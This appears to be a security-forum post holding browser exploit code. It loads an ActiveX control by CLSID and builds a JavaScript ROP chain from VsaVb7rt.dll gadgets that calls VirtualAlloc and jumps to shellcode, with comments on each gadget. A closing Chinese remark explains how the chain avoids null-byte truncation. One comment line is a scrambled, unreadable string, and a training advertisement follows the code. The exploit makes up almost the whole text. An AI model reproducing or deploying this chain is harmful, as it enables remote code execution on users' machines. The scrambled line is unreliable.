<object classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F'> </object>
<script>
function l32(base,offset){var address=base+offset;s=address.toString(16);while(s.length<8)s="0"+s;s1=s.substring(0,4);s2=s.substring(4,8);return '%u'+s2+'%u'+s1 }
function f()
{
//
e5bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0G2M7s2y4Z5k6h3I4D9i4K6u0W2j5$3!0E0i4K6u0r3M7X3!0H3M7$3g2S2M7X3y4Z5i4K6y4r3K9q4)9K6c8r3f1@1y4X3b7@1z5r3p5%4k6X3f1&6y4U0p5@1x3o6q4X3x3h3y4T1k6U0R3#2y4e0x3I4j5$3c8X3x3o6g2V1i4K6t1$3M7q4)9K6c8r3&6W2k6#2)9J5b7X3g2Q4x3U0f1J5y4s2R3`.
return unescape("%u3270%u5e28"+ // pop ebx/ret
"%u19b1%u5e26"+ //first call xchg eax,esp/ret
"%uf933%u5e34"+ //start to do somethin pop ecx/ret
"%uFFFF%uFFFF"+ //ecx==FFFFFFFF
"%ub44b%u5e2c"+ // ecx=0 inc ecx/ret
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+ //ecx=0x40
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
l32(0,0xfffff000-1)+
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4241%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%ub7cc%u5e34"+ // XOR EDX,EDX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+
"%ub5ee%u5e34"+ // ADD EDX,EBX // POP EBX // RETN 0x10[VsaVb7rt.dll]
"%u4141%u4141"+
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
l32(0,0xfffff000-1)+
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4141%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4
"%u4241%u4141"+
"%u4242%u4141"+
"%u4243%u4141"+
"%u4244%u4141"+
"%u4245%u4141"+
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4245%u4141"+
"%u113c%u5e23"+ // ptr to &VirtualAlloc() [IAT VsaVb7rt.dll]
"%u2a5f%u5e2a"+ // MOV EAX,DWORD PTR DS:[EAX] // RETN [VsaVb7rt.dll]
"%u4536%u5e30"+ // XCHG EAX,ESI // RETN [VsaVb7rt.dll]
"%ubd6f%u5e28"+ // POP EBP // RETN [VsaVb7rt.dll]
"%u7050%u5e28"+ // & jmp esp [VsaVb7rt.dll]
"%uff8d%u5e24"+ // POP EDI // RETN [VsaVb7rt.dll]
"%u315c%u5e28"+ // RETN (ROP NOP) [VsaVb7rt.dll]
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u9090%u9090"+ // nop
"%u22cc%u5e2f"+ // PUSHAD // RETN [VsaVb7rt.dll]
shellcode);
}
做这么复杂主要是因为0x0000的截断问题,所以这里避免在链中出现%u0000
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
